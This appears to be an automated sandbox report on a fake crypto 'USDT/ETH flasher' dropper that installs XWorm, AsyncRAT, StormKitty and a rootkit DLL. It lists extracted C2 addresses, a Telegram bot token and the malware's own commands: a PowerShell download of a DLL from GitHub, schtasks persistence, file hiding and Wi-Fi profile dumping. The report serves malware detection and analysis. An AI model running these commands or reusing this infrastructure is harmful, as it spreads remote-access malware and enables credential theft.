Overview
overview
10Static
static
10flashETHv.1.exe
windows7-x64
10flashETHv.1.exe
windows10-2004-x64
10S444.exe
windows7-x64
10S444.exe
windows10-2004-x64
10SYS.exe
windows7-x64
10SYS.exe
windows10-2004-x64
10USDT Flasher.exe
windows7-x64
3USDT Flasher.exe
windows10-2004-x64
3ss32.exe
windows7-x64
10ss32.exe
windows10-2004-x64
10winlogoc.exe
windows7-x64
10winlogoc.exe
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
09-12-2024 23:08
Behavioral task
behavioral1
Sample
flashETHv.1.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
flashETHv.1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
S444.exe
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
S444.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
SYS.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
SYS.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
USDT Flasher.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
USDT Flasher.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
ss32.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
ss32.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
winlogoc.exe
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
winlogoc.exe
Resource
win10v2004-20241007-en
General
-
Target
flashETHv.1.exe
-
Size
701KB
-
MD5
d57ac3c31d7069ee6a76c3572f5c234a
-
SHA1
e6f3b23343a9b716c7529d282a2322c1f528b576
-
SHA256
e73c96538ec60c2117b6ed82b7f95f8894abed022ee9ab03c1be90ebd9722f06
-
SHA512
cb4334c76c427305b9b83f2d110e75827c4a83d296679aa04876ccbfd35c7787014a914b722348c076f5d2a3f306f98fdced54ad967953af4ad25d3f3c9eb529
-
SSDEEP
12288:YwEWeJxd5eyh4R0a6mQlRkORS2DNIWWo0dK+/rYtlsfhZDFyJ/b9A64YVNSANzNc:YBfneyh4R0NPRFXBJWo0dK+/sjkhZZyM
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC64.dll
Extracted
xworm
SLL.casacam.net:4444
-
Install_directory
%LocalAppData%
-
install_file
Interrupi.exe
Extracted
asyncrat
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
https://api.telegram.org/bot7170788789:AAFDgtgiOhG8owpmypRYbNLRYrxlniuiyIs/sendMessage?chat_id=6101540297
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral1/files/0x000e00000001202b-6.dat family_xworm behavioral1/memory/2764-33-0x00000000009E0000-0x00000000009F8000-memory.dmp family_xworm behavioral1/memory/2460-38-0x0000000000500000-0x0000000000518000-memory.dmp family_xworm behavioral1/memory/1656-148-0x0000000000B90000-0x0000000000BA8000-memory.dmp family_xworm behavioral1/memory/2648-160-0x00000000011D0000-0x00000000011E8000-memory.dmp family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x0007000000016d67-27.dat family_stormkitty behavioral1/memory/2316-37-0x00000000011E0000-0x000000000121E000-memory.dmp family_stormkitty -
Stormkitty family
-
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000016d67-27.dat family_asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 17 2624 powershell.exe 19 2624 powershell.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2740 attrib.exe 2544 attrib.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe $77-System32.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe $77-System32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Interrupi.lnk winlogoc.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Interrupi.lnk winlogoc.exe -
Executes dropped EXE 9 IoCs
pid Process 2764 winlogoc.exe 2400 S444.exe 2460 ss32.exe 2316 SYS.exe 2772 USDT Flasher.exe 2952 $77-System32.exe 1656 Interrupi.exe 2648 Interrupi.exe 1816 Interrupi.exe -
Loads dropped DLL 6 IoCs
pid Process 2588 flashETHv.1.exe 2588 flashETHv.1.exe 2588 flashETHv.1.exe 2588 flashETHv.1.exe 2588 flashETHv.1.exe 2400 S444.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\Interrupi = "C:\\Users\\Admin\\AppData\\Local\\Interrupi.exe" winlogoc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe" $77-System32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe" $77-System32.exe -
pid Process 2624 powershell.exe -
Drops desktop.ini file(s) 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\2469301daede32439e751560d91d18f4\Admin@PJCSDMRP_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini SYS.exe File opened for modification C:\Users\Admin\AppData\Local\2469301daede32439e751560d91d18f4\Admin@PJCSDMRP_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini SYS.exe File created C:\Users\Admin\AppData\Local\2469301daede32439e751560d91d18f4\Admin@PJCSDMRP_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini SYS.exe File opened for modification C:\Users\Admin\AppData\Local\2469301daede32439e751560d91d18f4\Admin@PJCSDMRP_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini SYS.exe File created C:\Users\Admin\AppData\Local\2469301daede32439e751560d91d18f4\Admin@PJCSDMRP_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini SYS.exe File created C:\Users\Admin\AppData\Local\2469301daede32439e751560d91d18f4\Admin@PJCSDMRP_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini SYS.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 icanhazip.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language flashETHv.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language USDT Flasher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77-System32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language S444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SYS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2496 cmd.exe 2208 netsh.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 SYS.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier SYS.exe -
Modifies registry class 20 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff USDT Flasher.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}" USDT Flasher.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0" USDT Flasher.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU USDT Flasher.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 USDT Flasher.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg USDT Flasher.exe Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" USDT Flasher.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}" USDT Flasher.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff USDT Flasher.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000 USDT Flasher.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 USDT Flasher.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000 USDT Flasher.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 USDT Flasher.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags USDT Flasher.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 USDT Flasher.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings USDT Flasher.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell USDT Flasher.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots USDT Flasher.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff USDT Flasher.exe Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff USDT Flasher.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 ss32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 ss32.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1688 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 2460 ss32.exe 2764 winlogoc.exe 2952 $77-System32.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2316 SYS.exe 2316 SYS.exe 2316 SYS.exe 2316 SYS.exe 2316 SYS.exe 2624 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2772 USDT Flasher.exe -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 2460 ss32.exe Token: SeDebugPrivilege 2764 winlogoc.exe Token: SeDebugPrivilege 2316 SYS.exe Token: SeDebugPrivilege 2764 winlogoc.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeDebugPrivilege 1656 Interrupi.exe Token: SeDebugPrivilege 2952 $77-System32.exe Token: 33 2952 $77-System32.exe Token: SeIncBasePriorityPrivilege 2952 $77-System32.exe Token: 33 2952 $77-System32.exe Token: SeIncBasePriorityPrivilege 2952 $77-System32.exe Token: 33 2952 $77-System32.exe Token: SeIncBasePriorityPrivilege 2952 $77-System32.exe Token: 33 2952 $77-System32.exe Token: SeIncBasePriorityPrivilege 2952 $77-System32.exe Token: 33 2952 $77-System32.exe Token: SeIncBasePriorityPrivilege 2952 $77-System32.exe Token: SeDebugPrivilege 2648 Interrupi.exe Token: 33 2952 $77-System32.exe Token: SeIncBasePriorityPrivilege 2952 $77-System32.exe Token: 33 2952 $77-System32.exe Token: SeIncBasePriorityPrivilege 2952 $77-System32.exe Token: 33 2952 $77-System32.exe Token: SeIncBasePriorityPrivilege 2952 $77-System32.exe Token: 33 2952 $77-System32.exe Token: SeIncBasePriorityPrivilege 2952 $77-System32.exe Token: 33 2952 $77-System32.exe Token: SeIncBasePriorityPrivilege 2952 $77-System32.exe Token: 33 2952 $77-System32.exe Token: SeIncBasePriorityPrivilege 2952 $77-System32.exe Token: 33 2952 $77-System32.exe Token: SeIncBasePriorityPrivilege 2952 $77-System32.exe Token: SeDebugPrivilege 1816 Interrupi.exe Token: 33 2952 $77-System32.exe Token: SeIncBasePriorityPrivilege 2952 $77-System32.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2772 USDT Flasher.exe 2772 USDT Flasher.exe 2772 USDT Flasher.exe 2772 USDT Flasher.exe 2772 USDT Flasher.exe 2772 USDT Flasher.exe 2772 USDT Flasher.exe 2772 USDT Flasher.exe 2772 USDT Flasher.exe 2772 USDT Flasher.exe 2772 USDT Flasher.exe 2772 USDT Flasher.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2588 wrote to memory of 2764 2588 flashETHv.1.exe 30 PID 2588 wrote to memory of 2764 2588 flashETHv.1.exe 30 PID 2588 wrote to memory of 2764 2588 flashETHv.1.exe 30 PID 2588 wrote to memory of 2764 2588 flashETHv.1.exe 30 PID 2588 wrote to memory of 2400 2588 flashETHv.1.exe 31 PID 2588 wrote to memory of 2400 2588 flashETHv.1.exe 31 PID 2588 wrote to memory of 2400 2588 flashETHv.1.exe 31 PID 2588 wrote to memory of 2400 2588 flashETHv.1.exe 31 PID 2588 wrote to memory of 2460 2588 flashETHv.1.exe 32 PID 2588 wrote to memory of 2460 2588 flashETHv.1.exe 32 PID 2588 wrote to memory of 2460 2588 flashETHv.1.exe 32 PID 2588 wrote to memory of 2460 2588 flashETHv.1.exe 32 PID 2588 wrote to memory of 2316 2588 flashETHv.1.exe 33 PID 2588 wrote to memory of 2316 2588 flashETHv.1.exe 33 PID 2588 wrote to memory of 2316 2588 flashETHv.1.exe 33 PID 2588 wrote to memory of 2316 2588 flashETHv.1.exe 33 PID 2588 wrote to memory of 2772 2588 flashETHv.1.exe 34 PID 2588 wrote to memory of 2772 2588 flashETHv.1.exe 34 PID 2588 wrote to memory of 2772 2588 flashETHv.1.exe 34 PID 2588 wrote to memory of 2772 2588 flashETHv.1.exe 34 PID 2764 wrote to memory of 1688 2764 winlogoc.exe 36 PID 2764 wrote to memory of 1688 2764 winlogoc.exe 36 PID 2764 wrote to memory of 1688 2764 winlogoc.exe 36 PID 2400 wrote to memory of 2364 2400 S444.exe 38 PID 2400 wrote to memory of 2364 2400 S444.exe 38 PID 2400 wrote to memory of 2364 2400 S444.exe 38 PID 2400 wrote to memory of 2364 2400 S444.exe 38 PID 2364 wrote to memory of 2740 2364 cmd.exe 40 PID 2364 wrote to memory of 2740 2364 cmd.exe 40 PID 2364 wrote to memory of 2740 2364 cmd.exe 40 PID 2364 wrote to memory of 2740 2364 cmd.exe 40 PID 2400 wrote to memory of 2952 2400 S444.exe 41 PID 2400 wrote to memory of 2952 2400 S444.exe 41 PID 2400 wrote to memory of 2952 2400 S444.exe 41 PID 2400 wrote to memory of 2952 2400 S444.exe 41 PID 2316 wrote to memory of 2496 2316 SYS.exe 42 PID 2316 wrote to memory of 2496 2316 SYS.exe 42 PID 2316 wrote to memory of 2496 2316 SYS.exe 42 PID 2316 wrote to memory of 2496 2316 SYS.exe 42 PID 2496 wrote to memory of 1556 2496 cmd.exe 44 PID 2496 wrote to memory of 1556 2496 cmd.exe 44 PID 2496 wrote to memory of 1556 2496 cmd.exe 44 PID 2496 wrote to memory of 1556 2496 cmd.exe 44 PID 2496 wrote to memory of 2208 2496 cmd.exe 45 PID 2496 wrote to memory of 2208 2496 cmd.exe 45 PID 2496 wrote to memory of 2208 2496 cmd.exe 45 PID 2496 wrote to memory of 2208 2496 cmd.exe 45 PID 2496 wrote to memory of 2488 2496 cmd.exe 46 PID 2496 wrote to memory of 2488 2496 cmd.exe 46 PID 2496 wrote to memory of 2488 2496 cmd.exe 46 PID 2496 wrote to memory of 2488 2496 cmd.exe 46 PID 2316 wrote to memory of 528 2316 SYS.exe 47 PID 2316 wrote to memory of 528 2316 SYS.exe 47 PID 2316 wrote to memory of 528 2316 SYS.exe 47 PID 2316 wrote to memory of 528 2316 SYS.exe 47 PID 528 wrote to memory of 2228 528 cmd.exe 49 PID 528 wrote to memory of 2228 528 cmd.exe 49 PID 528 wrote to memory of 2228 528 cmd.exe 49 PID 528 wrote to memory of 2228 528 cmd.exe 49 PID 528 wrote to memory of 2148 528 cmd.exe 50 PID 528 wrote to memory of 2148 528 cmd.exe 50 PID 528 wrote to memory of 2148 528 cmd.exe 50 PID 528 wrote to memory of 2148 528 cmd.exe 50 PID 2952 wrote to memory of 1824 2952 $77-System32.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2740 attrib.exe 2544 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\flashETHv.1.exe"C:\Users\Admin\AppData\Local\Temp\flashETHv.1.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Users\Admin\AppData\Roaming\winlogoc.exe"C:\Users\Admin\AppData\Roaming\winlogoc.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Interrupi" /tr "C:\Users\Admin\AppData\Local\Interrupi.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1688
-
-
-
C:\Users\Admin\AppData\Roaming\S444.exe"C:\Users\Admin\AppData\Roaming\S444.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Roaming\S444.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Roaming\S444.exe"4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2740
-
-
-
C:\System32\$77-System32.exe"C:\System32\$77-System32.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\System32\$77-System32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1824 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\System32\$77-System32.exe"5⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:1708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','\System32\r77-x64.dll');exit5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\ss32.exe"C:\Users\Admin\AppData\Roaming\ss32.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Users\Admin\AppData\Roaming\SYS.exe"C:\Users\Admin\AppData\Roaming\SYS.exe"2⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
- System Location Discovery: System Language Discovery
PID:1556
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2208
-
-
C:\Windows\SysWOW64\findstr.exefindstr All4⤵
- System Location Discovery: System Language Discovery
PID:2488
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:528 -
